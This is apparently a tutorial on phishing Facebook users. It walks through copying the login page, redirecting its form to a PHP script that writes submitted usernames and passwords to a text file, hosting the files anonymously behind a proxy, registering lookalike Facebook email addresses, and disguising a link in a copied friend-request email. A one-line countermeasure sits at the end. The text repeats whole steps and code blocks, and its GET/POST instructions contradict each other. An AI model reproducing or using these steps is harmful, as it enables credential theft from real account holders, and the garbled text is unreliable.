Tension not! Here is an article that may help you cross the road.
Check out:
Step1:
Go to Facebook.com
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:
The big red ring that circles the action= you have to
change. You have to change it to 'action="next.php" '. after you have
done that, you should change the method (small red circle on the picture) to
"get" instead of "post", or else it will not work. Save the
document as index.html
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step5:
create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
Step6 :
Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated*
everyone asking doubts about this 6th step. You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail. In that content , you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step5:
create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
Step6 :
Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated*
everyone asking doubts about this 6th step. You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail. In that content , you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
Add hyperlink button in the red circle. now write your
phisher page url in the hyperlink bar that appears after clicking the button.
and click add. The hyperlink should still display
http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..
but lead to your phisher page..
Countermeasure:
You must not reply any message from facebook may it be
legitimate or not by clicking on any links that appear in mail box. Better
whenever you receive any mail of this type report it to facebook.com by logging
via typing www.facebook.com in your web browser.
